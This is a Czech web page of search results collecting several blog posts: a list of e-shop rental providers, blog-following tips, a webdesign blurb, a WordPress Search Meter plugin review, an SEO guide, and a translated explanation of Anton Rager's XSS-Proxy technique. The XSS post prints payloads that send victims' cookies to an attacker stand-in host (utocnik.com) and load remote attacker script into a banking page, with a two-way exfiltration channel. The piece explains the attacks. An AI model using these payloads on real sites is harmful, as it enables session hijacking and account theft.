Výsledky vyhledávání v sekci E-shopy a šablony na dotaz search meter

Od koho pronajmout e-shop?

access_time10.červen 2019personZdenek Slavik

K dnešnímu článku (seznamu) mě motivovalo moje nedávné nasazení pluginu jménem Search Meter, který vám dokáže prozradit, co návštěvníci na vašich stránkách hledají.A jelikož se nashromáždilo již více jak 10 neúspěšných hledáních na téma od koho pronajmout e-shop, tak jsem se rozhodl v tomto směru návštěvníkům vyhovět, aby již našli to, co hledají a udělat zde takový malý přehled všech poskytovatelů (alespoň co znám a které jsem našel).Je jasné, že u každého nemohu napsat jejich plusy a mínusy, jelikož jsem je neměl možnost všechny odzkoušet (osobně mám zkušenost jen se třemi, o jednom jsem již napsal, viz kousek níž), takže zde spíše nechám prostor pro uživatele, aby se sami mezi sebou případně podělili o zkušenosti.Do budoucna (vše nejde hned, ale budu se snažit co nejdříve :-)) mohu slíbit to, že se všechny poskytovatele pokusím postupně vyzkoušet, pokud nabízí nějakou tu zkušební verzi zdarma a napsat na ně objektivní recenzi, jako jsem to již udělal například u Atomer.cz ;-).Ještě, než jsem hodím seznam poskytovatelů, tak bych rád řekl, že pokud jsem nějaké řešení případně opomněl, tak to nebylo rozhodně schválně. Právě i pro tyto případy jsou zde k dispozici komentáře, kde mě můžete klidně doplnit a já rád seznam aktualizuji  ;-).Ještě malé doplnění, seznam je a i do budoucna bude bez odkazů, jelikož nemám v plánu zde vytvářet nějaké katalogy stránek, ale pouze vás upozornit na případné možnosti a okopírovat adresu zvládne každý si myslím ;-).http://www.shopsys.czhttp://www.shoptet.czhttp://www.simplia.czhttp://www.eshop-rychle.cz  –  (recenze)http://www.web-rychle.euhttp://www.webareal.cz – (recenze)http://www.atomer.cz –  (recenze)http://www.hostshop.czhttp://www.sunlight.czhttp://www.sun-shop.czhttp://www.ready2go.czhttp://www.4shop.czhttp://www.onlinestore.czhttp://www.proeshop.czhttp://www.inshop.czhttp://www.active24.cz/produkty-a-sluzby/eshopyhttp://www.webczech.czhttp://www.shopset.czhttp://www.eshop-snadne.czhttp://www.shop360.czhttp://www.elinkx.czhttp://www.evron.czhttp://www.shop4you.czhttp://www.tvujeshop.czhttp://www.easy-shop.czhttp://www.mastershop.czhttp://www.fastcentrik.czhttp://www.shopcentrik.czhttp://www.microdesign.czhttp://www.plugo.czhttp://ekosik.czhttp://www.shop5.czhttp://www.fastshops.czhttp://www.azeshop.czhttp://www.shopion.czhttp://www.bsshop.czhttp://www.pronajem-eshop.czhttp://www.eshophned.czhttp://www.inspirio.czhttp://fumiko.czhttp://www.ekdesign.czhttp://www.ziskovy-eshop.czhttp://www.fajn-eshop.czhttp://www.binargon.czhttp://www.shopmc.czhttp://www.tvorba-eshopu.czhttp://www.martinzemanek.czhttp://www.byznysweb.czhttp://www.webmex.czhttp://www.lite-shop.czhttp://www.jzshop.czhttp://www.webgarden.czhttp://www.webnode.cz/internetovy-obchodhttp://www.oxiweb.czhttp://www.als.czhttp://shopsystem.czBy člověk ani nevěřil, kolik řešeních je na trhu (a to mi jich tu určitě ještě několik chybí), tak doufám, že vám tento skromný seznam případně poslouží ;-).Líbil se vám tento článek? Tak ho neváhejte šířit dál!

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Webové stránky na dotaz search meter

Sledujte vaše oblíbené blogy – přehledně a efektivně

access_time13.květen 2019personJana

Určitě máte své oblíbené blogy. A jestli ne, jistě si jich mnoho najdete, jakmile se do blogosféry trochu více ponoříte. Určitě je dobré minimálně si najít několik blogů z vaší oblasti, a sledovat, o čem píší.Sledování blogů je ale velmi časově náročná činnost. A pokud byste měli všechny blogy proklikávat každý den a zjišťovat, co je nového, nedělali byste nic jiného.Naštěstí ale existují různé šikovné nástroje, které vám práci usnadní. Podívejme se nyní, co by vám mohlo pomoci:1. Zasílání nových příspěvků mailemVětšina blogů umožňuje, abyste se zaregistrovali a budete pak dostávat mailem každý nový příspěvek, nebo třeba týdenní shrnutí. Pokud sledujete jen pár blogů, je tento způsob v pořádku, ale jakmile máte více sledovaných blogů, budete mít zahlcenou e-mailovou schránku.2. Sledování blogů v BloggeruPokud máte svůj blog na Bloggeru, přímo na vaší domácí stránce můžete pohodlně sledovat nové příspěvky na vašich oblíbených blozích. Přidat můžete nejen blogy, které běží na Bloggeru, ale i z jiných platforem.Sledované blogy najdete v Seznamu četby. Přidávat nové blogy můžete buď pomocí funkce „Přidat“, nebo pokud jste na stránce blogu, který umožňuje přidat se pomocí sledování Google, najdete tam  ikonu s touto akcí a na tak stačí kliknout na text „Připojte se k tomuto webu“Když si sem přidáte nějaký blog, máte ho i v Google Readeru, který máte automaticky, pokud máte na Googlu účet. Takže i v případě, že nemáte svůj blog na Bloggeru, můžete použít Google Reader.3. Sledování pomocí BlogLovin‘Tato služba funguje na podobném principu, jako sledování na Bloggeru. Využijete ji, pokud nemáte účet na Bloggeru ani na Google, nebo tam nechcete z jakéhokoli důvodu sledování používat. Pokud máte Apple počítač nebo třeba iPad, můžet si stáhnout zdarma i aplikaci BlogLovin’. Pokud jste zde již zaregistrovaní, můžete si také stáhnout obyčejné nebo pěkné ilustrované ikonky na váš vlastní blog, aby vás přes BlogLovin‘ mohli jednoduše sledovat i vaši čtenáři. BlogLovin‘ vám bude zasílat denně souhrn nových příspěvků na vašich oblíbených blozích do mailu. Můžete ale i úplně vypnout zasílání souhrnů a nebo si nechat zasílat každý nový příspěvek zvlášť  (nedoporučuji, pokud máte více sledovaných blogů). Blogy ke sledování tu můžete také snadno vyhledávat pomocí funkce Search for blogs… 4. Sledování pomocí RSSRSS neboli Rich Site Summary je nástroj, pomocí kterého můžete sledovat pravidelně se aktualizující stránky (nejen blogy). Novější verzí tohoto je Atom. Na mnoha blozích najdete ikonku pro RSS. RSS příspěvky můžete sledovat také ve vaší e-mailové schránce, ale to opět nedoporučuji, budete zahlceni maily. Lepší je stáhnout a nainstalovat si nějakou RSS čtečku, kterých je na webu spousta zdarma – zapř. RSS Reader - a sledovat nové příspěvky tam.Ikonka pro RSS, kterou můžete najít na svém oblíbeném blogu, například na webživě můžete najít RSS feed na URL adrese https://webzive.cz/rss5. Facebook, TwitterAutoři blogů často dávají upozornění na nové články také na Facebook nebo Twitter. Pokud jste tedy třeba na Facebooku jako doma a váš oblíbený bloger je tam také, můžete sledovat, co je u něj nového, rovnou odtud.Seznam možností jistě není vyčerpávající, existuje i řada dalších nástrojů, jako třeba My Yahoo nebo PageFlakes… Ale s výše uvedeným seznamem byste si měli jistě vystačit. Ideální je, vybrat si jeden nástroj, a toho se držet, abyste měli vše na jednom místě a neměli ve sledovaných blozích zmatek.Máte svůj oblíbený způsob, jak sledovat blogy?

folder_openPřiřazené štítky

Kvalitní a profesionální webdesign

access_time21.březen 2020personRedakce

Webdesign je pojem, pod nímž můžeme shrnout hned několik činností týkající se tvorby internetových stránek. Pokud mluvíme o webdesignu, pak současně myslíme vizuální vzhled webových stránek, ale také jejich logickou strukturu, což je provázání stránek mezi sebou a jejich vzájemné vztahy.Webdesign jednoduše popisuje to, jak webové stránky vypadají ze všech možných úhlů pohledů. V současné době poznáte kvalitní webdesign tak, že jsou internetové stránky propracované do nejmenších detailů. Současně by měla tvorba webdesignu dodržovat veškerá platná pravidla pro moderní web.Webdesigner má volnou rukuPod pojmem webdesign si představíme nejspíše řemeslo, které musí mít svého řemeslníka, tedy webdesignera. Tento člověk by měl svou práci zvládat na špičkové úrovni. Webdesigner je člověk, který má rozsáhlý přehled o veškerých možnostech současného internetu. Právě webdesigner Vám dokáže jednoduše vysvětlit, co pro Vás, respektive pro Váš web může udělat.Na každém projektu zpravidla pracují tři hlavní lidé, a to grafik, kodér a programátor. Tvorba webdesignu je však v hlavní kompetenci webdesignera, který musí znát veškerá pravidla. Své zkušenosti pak prolíná do praxe.Webdesign v praxiVizitkou každého webdesignera je jeho práce, a proto vše záleží na kvalitním, moderním a hlavně originálním provedení. V současné době se klade velký důraz na originalitu, díky níž si Vás mohouzákazníci zapamatovat. K práci webdesignera patří také redesign starší prezentace. Jestliže se Vám tedy již stará webová stránka nelíbí, pak se přikloňte k její rekonstrukci, která zahrnuje i přetvořenístávajícího webdesignu.S webdesignem je také úzce spojena činnost, která se nazývá SEO (Search Engine Optimization), což česky znamená optimalizace pro vyhledávače.Každá webová prezentace má svůj cíl či účel. Cílem může být celá řada věcí a na každého webdesignera připadá hlavní práce, která musí být originální. Výsledkem by se měl stát kvalitně provedený webdesing včetně detailů.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci SEO a vyhledávače na dotaz search meter

Chcete vědět, co u vás na stránkách návštěvníci hledají?

access_time11.červen 2019personZdenek Slavik

Každý provozovatel internetových stránek by měl v první řadě koukat na to, aby tam jeho návštěvníci našli vždy to, co hledají, jelikož to je základ pro celkový úspěch. Kromě sledování různých statistik návštěvnosti atd., by nemělo být opomenuto i monitorování slovních výrazů, které zadávají návštěvníci přímo do hledacího okénka na stránkách.Pro tento účel jsem objevil vynikající plugin pro WordPress, který se jmenuje Search Metera můžete si ho případně rovnou stáhnout zde: Search MeterTento plugin stačí defakto jen nahrát na FTP a aktivovat, jelikož nemá žádné velké nároky na nastavení. V nastavení můžete zvolit komu se budou zobrazovat statistiky (to je v případě, že na stránkách pracuje více lidí a případně nechcete, aby tyto údaje znali) a nastavit případně filtr slov. Plugin je pouze v angličtině, ale myslím si, že to nebude pro nikoho žádný problém a rychle se v statistikách zorientuje ;-).Pro názornější ukázku toho, jak plugin funguje přidávám i obrázky níže, ze kterých si myslím, že je jasné, co všechno se dá zachytit a zjistit pomocí tohoto pluginu. Jen ještě pro vysvětlenou, plugin mám na webu klasicky v angličtině, ale pro pořízení obrázků jsem využil služeb překladače od Googlu, tak se nelekněte občas té češtiny nečeštiny :-).Jak na obrázku můžete vidět, je vždy zachycen hledaný výraz, počet jeho hledání a počet nalezených výsledků. Když by jste klikli na hledaný výraz, tak vás automaticky přesměruje v administraci do přehledu článků, kde jsou vyselektovány jen ty, které obsahují hledaný parametr.Neúspěšné hledání zatím u mě neproběhlo a nechtěl jsem to uměle vyvolávat jen pro názornou ukázku, proto tam nic nenajdete. Ale, pokud by se nějaký takový výraz našel, může to být pro vás námět, o čem napsat příště. Nikde není napsáno, že když to hledá zatím pouze jeden člověk, tak že to nebudou v brzké době hledat i další ;-).Pokud překliknete v hořejším menu na posledních 100, či 500 vyhledávání, tak se vám ukáže toto, viz níže. Ještě poznámka, pokud kliknete na hledaný dotaz, opět vás to přesměruje do přehledu článků, jak už jsem psal výše.Pokud kliknete na Zobrazit podrobnosti, tak se vám zobrazí takovéto statistiky, viz názorná ukázka níže ;-).Plugin testuji teprve pár dní, přesto si myslím, že funguje naprosto perfektně a dokáže poskytnout užitečné informace provozovateli webu. 

folder_openPřiřazené štítky

Co je to SEO a jak může dopomoci e-shopům k vyšším ziskům?

access_time20.duben 2020personRedakce

Pokud máte pouze matnou představu či nemáte vůbec žádnou představu, co se za magickou zkratkou SEO skrývá, pak jsou vám určeny následující řádky. Do problematiky SEO vás stručně zasvětí a mohou se stát odrazovým můstkem k dalšímu studiu.SEO a jeho cíleZkratka SEO pochází z angličtiny a za jeho písmeny se skrývá slovní spojení Search Engine Optimalization neboli optimalizace pro webové vyhledávače. Z rozklíčování této zkratky mimochodem vyplývá skutečnost, že hojně užívané spojení „SEO optimalizace“ je jednoduše nesprávné.Hlavním cílem SEO by měly být vyšší zisky vašeho e-shopu a nikoliv za každou cenu jeho vyšší návštěvnost. Tisíce návštěvníků, kteří si nic nekoupí, popřípadě neprovedou jinou alespoň k budoucím nákupům směřující aktivitu (například přihlášení newsletteru), vám totiž zpravidla nepřinesou žádný užitek. S trochou nadsázky řečeno, jen zbytečně vytíží váš webhosting. Správné SEO tedy do vašeho e-shopu musí přivádět návštěvníky, kteří hledají vámi nabízené zboží.Tedy řečeno jasně a jednoduše, SEO je technika mající za cíl zlepšit vaše pozice ve vyhledávačích na relevantní klíčová slova.Analýza klíčových slov neboli „klíčovka“Prvním krokem optimalizace pro vyhledávače musí být analýza klíčových slov označovaná v žargonu jako takzvaná „klíčovka“. Právě ta by měla odhalit relevantní klíčovaná slova (keywords či jen KWs), na která se v dalších krocích optimalizace zaměříte. Její závěry však rozhodně nesmíte považovat za definitivní. Vyhledávací trendy se totiž mění a stejně tak se mění i konkurence bojující o pozice na jednotlivá klíčová slova.On-page SEOMáte-li hotovou klíčovku, můžete se pustit do práce na optimalizaci tzv. on-page faktorů, tedy faktorů ovlivňujících pozice ve vyhledávačích, jež se nachází přímo na stránkách vašeho e-shopu.Klíčová slova na stránceZákladem jsou klíčová slova vyskytující se na konkrétní stránce. Hoďte však za hlavu poučky, že by se měla konkrétní klíčová slova vyskytovat na stránce v té a té míře. Nejenže jsou tyto poučky spíše spekulativní, ale ve výsledku vás mohou dotlačit do sepsání textu, který se možná bude líbit vyhledávačům, ale pro zákazníka bude naprosto nečitelný. Právě v této fázi optimalizace pro vyhledávače je patrně nejvíce nutné myslet na to, že je to zákazník, kdo u vás nakonec utratí peníze, a nikoliv vyhledávač.Interní prolinkováníDalším, dle našeho názoru velmi důležitým on-page faktorem, je logická struktura e-shopu a jeho interní prolinkování.  Přehledně řazené zboží v kategoriích a podkategoriích doplněné šikovně umístněnými odkazy se totiž líbí nejen vyhledávačům, ale také zákazníkům.HTML kódMyslet je rovněž třeba na zdrojový kód stránky a vhodné využívání HTML tagů. Kód, který je plný chyb, nemusí umět robot vyhledávače správně přečíst a nepotěší ho ani spousta neplatných odkazů. Co se týče HTML tagů, zaměřte se především na správné používání nadpisů (<h1>, <h2>, …), které navíc usnadní orientaci v delším textu (všimněte si například struktury tohoto článku), a také na tagy <strong> pro zvýraznění textu a <em> pro kurzívu.SEO friendly ULRZapomínat byste rovněž neměli na URL adresu. Bezesporu není nutné snažit se dostat vaše hlavní klíčové slovo do názvu domény 2. řádu, neboť vliv tohoto faktoru se u vyhledávače Google limitně blíží nule a u Seznamu by jeho význam neměl být přeceňován. Z hlediska optimalizace a především uživatelské přívětivosti je daleko důležitější podívat se na část URL adresy za pomlčkou.HTTPS?V neposlední řadě se zastavme ještě u protokolu HTTPS. Zahraničním e-shopů lze přechod na HTTPS rozhodně doporučit. Zelený zámeček v adresním řádku působí důvěryhodně a Google těmto stránkám přidává „plusové body“ podobně jako v rámci mobilního vyhledávání přidává „plusové body“ stránkám optimalizovaným pro mobilní telefony. Odlišná je však situace v tuzemsku, kde má stále velký podíl na vyhledávání Seznam, který má doposud velké problémy s indexací webů, jež využívají zabezpečený protokol HTTPS. Náprava by pak měla být prý sjednána začátkem roku 2016.Off-page SEODalší kategorií faktorů, které ovlivňují pozice ve vyhledávačích, jsou ty, které se nenacházejí na stránce, ale mimo ni. Nebudeme dlouho napínat. Jedná se především o odkazy vedoucí na stránky vašeho e-shopu. Metoda získávání těchto odkazů se pak označuje jako linkbuilding, přičemž v následujících odstavcích se podíváme na některé jeho základní zásady.Linkbuilding jako dlouhodobý procesPředně je nutno si říct, že odkazy vedoucí na váš e-shop je lepší získávat kontinuálně než nárazově. Vyhledávačům jde totiž v současnosti stále více o to, aby byl odkazový profil přirozený. Velký nárůst odkazů v krátkém čase pak zpravidla svědčí o opaku. Dlouhodobé získávání nových odkazů je sice dřina, ale po čase přinese kýžené ovoce. Na rozdíl od provozovatele, který nakoupí nárazově stovky odkazů, se také nebudete muset obávat, že vás vyhledávač penalizuje za manipulaci s výsledky vyhledávání.Kvalita odkazů – ranky jsou pomalu paséHledět je rovněž třeba na kvalitu odkazů. Kvalitu odkazující stránky dnes už moc nenapoví tzv. ranky (S-rank a Page Rank), neboť aktualizace jejich zveřejňovaných hodnot dnes probíhá velmi sporadicky, tudíž značně ztratily na relevanci. Daleko lepší je podívat se na kvalitu obsahu, množství nových článků a aktivitu na stránce obecně. Chce to trochu více intuice než v případě technokratického lpění na ranku, odměnou vám však může být odkaz ze zajímavé webové stránky, který nakonec může přivést i nové nakupující. Podpůrně mohou o kvalitě webové stánky vypovědět také nástroje, které analyzují odkazový profil konkrétní stránky.Pamatujte: Zpětné odkazy jsou pořád tím nejlepším ukazatelem kvality stránek. Nikdo zatím lepší indikátor nenašel. Záleží však na kvalitě.Anchor textCo se týče tzv. anchor textu, tedy textu, v němž je vložen odkaz, i u něj platí, že jeho význam slábne. Pestrost a přirozenost anchor textů je dnes daleko lepší než jedno, stále se opakující klíčové slovo, z nějž vede stále ten samý odkaz.Odkazujte i do hlubin vašeho e-shopuPokud budete vést odkazy pouze na hlavní stránku, efekt linkbuildingu nebude velký. Mnohem přínosnější je odkazovat i na různé podstránky, tedy například na konkrétní produkty či kategorie zboží a s ohledem na to se zaměřovat na různá klíčová slova. Váš odkazový profil tak bude mnohem přirozenější a efekt příchozích odkazů (fajnšmekři mu říkají link juice) bude rovněž daleko lépe proudit skrze celou strukturu e-shopu.Přirozenost nadevšePři budování odkazového profilu je potřeba myslet především na jeho přirozenost, což patrně vyplynulo i z předchozích odstavců. Seznam ani Google totiž nevidí rádi uměle získané či dokonce koupené odkazy. Pravdou je, že v jejich odhalování je Google daleko před Seznamem. Chytré budování zpětných odkazů tak může probíhat například prostřednictvím publikování zajímavého obsahu, na který zbytek internetu ochotně odkazuje či ho sdílí na sociálních sítích. Nutno podotknout, že vliv sociálních sítí na SEO rovněž roste. Články nabité informacemi, přehledné infografiky či instruktážní videa jsou dobrým příkladem takového obsahu. Krajní polohou této techniky je tzv. linkbaiting, který spočívá ve vytváření kontroverzního, provokativního či jinak extrémně poutavého obsahu. Mějte však na paměti, že takový obsah může sice oslovit široké publikum, ale rovněž může řadu potenciálních nakupujících od nákupu navždy odradit. Proto linkbaiting využívejte s velkou opatrností a s dobrým rozmyslem.Co říct závěrem?SEO není žádné dogma a každý, kdo optimalizaci webových stránek pro vyhledávače provádí, má své vlastní techniky a upřednostňuje jiné metody. Je však třeba pamatovat, že v rámci SEO je nutné sledovat aktuální trendy, neboť to, co platilo na vyhledávače loni, dnes už dávno platit nemusí.Shora uvedený výčet metod optimalizace pro vyhledávače rozhodně neaspiruje na to být výčtem úplným. Proto máte-li své vyzkoušené metody, budeme rádi, pokud se o ně podělíte s ostatními čtenáři.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Hacking na dotaz search meter

Pokročilé techniky xss (cross-site scripting)

access_time16.červen 2020personRedakce

Popis pokročilého Cross-Site-Scriptingu, se vzdálenou kontrolou v reálném čase, od autora aplikace XSS-proxy jménem Anton Rager. Cross Site Scripting (XSS) je mnoha vývojáři a security profesionály obvykle považován za málo závažnou bezpečnostní zranitelnost. Do dnešní doby vznikla řada projektů s poukazem na potencionální rizika XSS, ale problém je převažne na pokraji zájmu bezpečnostních expertů a to včetně širších souvislostí o které tady jde.Autor aplikace XSS proxy napsal a zveřejnil popis v naději, že se odlehčený pohled na věc změní. Cituji: Doufám, že tímto dokumentem a vydáním nástroje pod jménem XSS-proxy (popsáno níže) změním pohled na celou situaci. XSS-Proxy umožňuje plnou kontrolu XSS útoků vzdáleným uživatelem (útočníkem). Tento dokument popisuje obvyklé XSS útoky a představuje nové metody/nástroje pro vytváření interaktivních XSS útoků, obojsměrných útoků a ještě více zla.Nejedná se o detailní návod (XSS howto), ale o širší vysvětlení metod XSS útoků. CGISecurity XSS FAQ (1) je dobrý zdroj pro celkový pohled na problematiku hlavních XSS zranitelností. V závěru textu jsou reference (2,3,4,5) obsahujíci skvělý materiál pro navazujíci XSS témata.Projekt XSS-proxy nevznikl jako platforma pro diskuzi a řešení. Existuje celá řada zdrojů, metod a možností pro hlášení chyb nebo opravování XSS děr. Pokročilé metody XSS které budou v textu představeny obcházejí mnoho metod aplikovaných proti XSS zranitelnostem. Doporučené čtení o hidden form inputs, URL re-writing, POST methods častokrát podsouvají řešení které nejsou 100% učinné, obzvlásť v případě, že má útočník přístup ke stejnému obsahu (a jscript/values) jako jeho oběť. Zbavit se všech speciálních HTML znaků nebo precizní filtrování vstupu je k ničemu v případě, že existuje neobjevený způsob jak vstup obelstít. Řešením může být rozdelení webových stránek na četné dokumentové domény, kde bude pro útočníka mnohem obtížnější provést/najít XSS útok/zranitelnost v porovnání s jediným místem kde je vše pohromadě. CGI vyhledávání na stránce v jedné subdoméně a citlivé oblasti na další(ch) může být užitečné.Pozadí XSSJako mnoho z vás ví, běžné XSS útoky vycházejí typicky ze dvou základních principů:1 – Útočník uploaduje <script> tag do veřejného fóra, blogu nebo stránek které navštevují uživatelé a obsahují XSS zranitelnost. Útočník pak díky přístupu získa (harvesting cookies) cookies webové stránky ze kterých vyčte řadu důležitých informací a díky tomu častokrát i přítpup k uživatelským účtum. Útoky jsou ale někdy využitelné mnohem hlouběji. Zde je to co myslím a říkam mnoha lidem co XSS přesně znamená. Příklad:Někdo chce odeslat následujíci kód na utocnik.com aby to další uživatelé sprocesovali.<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>Je to pokus o získání obrázku ze serveru útočníka pomocí cookies uživatele blogu priklad.com v URL.2 – Útočník použije veřejný web náchylný na útok XSS jak bylo uvedeno nahoře, nebo email zprávu založenu na XSS pro přesměrování uživatele na druhý server zranitelný pomocí XSS. Druhý server je aktuální cíl útočníka a stránka samozřejme obsahuje vlastní XSS zranitelnost, kde nic netušíci uživatel injektuje obsah <script> do dokumentu, který navenek pouze vidí. To v kombinaci s přesměrováním z dalšího webu umožňuje podvržení cookies, podvržení form/submit obsahu nebo specifickou akci XSSnutého uživatele proti dalšímu webu. Tato metoda je hodně rozšířena ale pramálo admiínistrátorů chápe, že se jedná o způsob útoku. Jak to funguje?Někdo chce odeslat následujíci kód na priklad.com aby to další uživatelé sprocesovali. <script>document.location=’http://ebanking.com/search?name=<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>'</script>Moment kdy je uživatel přesměrován na ebanking.com s hořejší XSS, toto je to co se vrátí uživateli a bude spuštěno:<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>To je pokus o získání obrázku ze serveru útočníka s cookies uživatele ebanking.com v URL.V minulosti hodně lidí zdůrazňovalo, že pokročilou manipulaci s webovým obsahem lze dosáhnout s XSS skriptem otevirajícím IFRAME (nebo další windows-like element) a loads/submits pro další dokumenty na stejné stránce. Důvěra v DOM umožňuje přítomnost Javascriptu v dokumentech a dovoluje interakci s dalšími windows/IFRAME, do doby než budou okna směrována do stejné dokumentové domény (protokol + domain_name + port).Aktuální metody XSS útoků jsou typicky limitovány pro jednu transakci a ve výsledku pouze v rámci cílové stránky, cookie harvesting nebo podvržení formuláře (form submission leakage). Zásady XSS-Proxy / ÚtokuXSS-Proxy rozšířuje běžné XSS útoky a kombinuje je s možností vykonání dalších Javascript příkazů, z libovolného vzdáleného serveru (viz Javascript Remoting reference číslo (6) pro detaily s IFRAME) pro možnost XSS být více než-li přesměrování s únikem cookies. Tato kombinace útočnikovi umožňuje ustavit stabilní, obousměrný kontrolní/přenosový kanál na oběť XSS a tím přistupovat na XSSnuté webové stránky s identitou oběti. Po celou dobu co má oběť útočníka otevřené XSS okno má útočník totální kontrolu nad prohlížečem oběti oproti XSS stránce s možností přesměrování na další stránky zranitelné XSS, nebo předání specifického blind requestu dalším serverům (viz reference číslo (3) provádění Cross-Site-Request-Forgeries aka CSRF a reference číslo (4) pro Session-Riding).Zmíněné situace lze dosáhnou s jedním nebo druhým útokem popsaným nahoře, teď se pokusíme názorně popsat příklad dvojího XSS přesměrování serveru. Oběť dostane XSS vektor pomocí blogu, diskuzního boardu, emailem atp. (předpokládaejme, že oběť surfuje na webech kde je možné vytvořit XSS – zavoláme stránku spatnyblog.com) a Javascript obsah přesměruje uživatele na druhou stránku (zavoláme druhou stránku ebanking.com a předpokládame samozřejmě, že stránka obsahuje XSS vo vyhledávací funkci, takže můžeme opakovat pomocí GET). Přesměrovací URL referuje na refers to a napadnutelnou část (cgi/etc) na druhém serveru což způsobý odezvu serveru která bude obsahovat Javascript příkaz útočníka který oběť vykoná.Inicializační XSS vektor na spatnyblog.com bude vypadat nějak takhle:<script>document.location=“http://ebanking.com/search?name=<script src=’http://utocnik.com/xss.js‘></script>“</script>Okno oběti teď má dokumentovou doménu ebanking.com a Javascript příkazy běží na doméně. Díky Javascript oběť posílá requesty na http://utocnik.com pro další skriptové příkazy. Nástroj XSS-Proxy aktuálně běží na utocnik.com a posyktuje další Javascripty pro inicializaci klientské části obsahujíci třeba funkce pro čtení dokumentů, procesování, přesměrování odpovědí, manipulaci chyb (error handling), stejně jako další příkazy pro vytvoření IFRAME, načtení root dokumentu (/) na cílovém serveru (ebanking.com) do IFRAME, načtení trvá pár vteřin, čtení obsahu (za použití innerHTML), pak následují další požadavek skriptů na http://utocnik.com. To vypadá komplexně ale jedná se pouze o několik řešení a reference časovač pro více volání skriptu na XSS-Proxy server. Funkce zůstanou v paměti až do doby než se okno oběti změní. Co se stane když od oběťi odejdou na http://utocnik.com subsekvenční skript requesty? Aktuálně se stanou dvě věci:1 – Obsah dokumentu v IFRAME (výsledky innerHTML pro daný objekt) jsou podvrženy do URL v skript requestu. Requesty skriptu jsou pouze GET, takže všechny volání skriptu obětí jsou jako volání normálniho dokumentu a ukládají parm/info na URL za jméno skriptu/stránky. Toto volání skriptu způsobý na serveru útočníka něco jako:GET /xss.js?data=Encoded_innerHTML_Contents HTTP/1.1Je to o něco víc komplexnější než to, že IE limituje délku URL (na přibližně 2049 znaků), takže většina dokumentů bude potřebovat naporcovat na části, které se na skritp URL request budou schopny dát dohromady. Aktuální nástroje se s tímto snaží vypořádat tak, že umísťují do URL dotazů přídavné informace pro znovusestavení (podobně jak to funguje u TCP/IP paketů).2 – Server na http://utocnik.com odpoví na poslední požadavek skriptu s více skirpt příkazy pro zachování trvání. Server buďto odpoví pomocía.) loop requestu (obyčejně řekne oběti počkej pár vteřin, pak znovu zkontroluj zda-li existují další příkazy skriptu)b.) dokument requestu (vlož dokument do IFRAME, přečti ho a přepošli výsledky pokud tě o to skript požádá)c.) submit requestu (nastav hodnoty vstupu ve formuláři s IFRAME, odešli, čekej na odpověď, přečti odpověď přepošli výsldek zpátky pokud o to skript požádá).Nebo pomocí javascript var/funkce požadavek na vyhodonocení (vyhodnoť výraz uvnitř aktuálniho okna v prohlížeči oběti a vrať výsledek+get příkazy). Proces pokračuje tak dloho jak oběť setrváva na stejné stránce.Zde je ASCII vizualizace okna a vysvětlení v souvislostech s cílem útočníka, po tom co je oběť přesměrována na finálni cíl a inicializován únos session:Existuje řada metod pro zamaskování aktuálniho „rezidentního“ okna pro útok (attack window) nebo IFRAME zaváděče. Celé okno lze schovat, stejně tak zrušit původní obsah stránek nebo proste použít skrytý IFRAME. Nástroj XSS-Proxy o kterém mluvíme, necháva okno včetně IFRAME pro oběť viditelné, ale modifikace je triviální (třeba interaktivně s Javascript Eval from). Existují i metody jak donutiti uživatele otevřít nové okno a obejít blokování pop-up oken. Jak? XSS proces přepíše odkazy v originálním dokumentu a otevření okne je pak pouze otázkou kliku. Nové oknomůže být kopii (zrcadlem) toho co si uživatel právě prohlíží, nebo výsledek odkliknutého odkazu ve veřejném XSS dokumentu a zmanipuluje oběť tak, že okno kontrolované XSS nechá běžet když dál surfuje.

folder_openPřiřazené štítky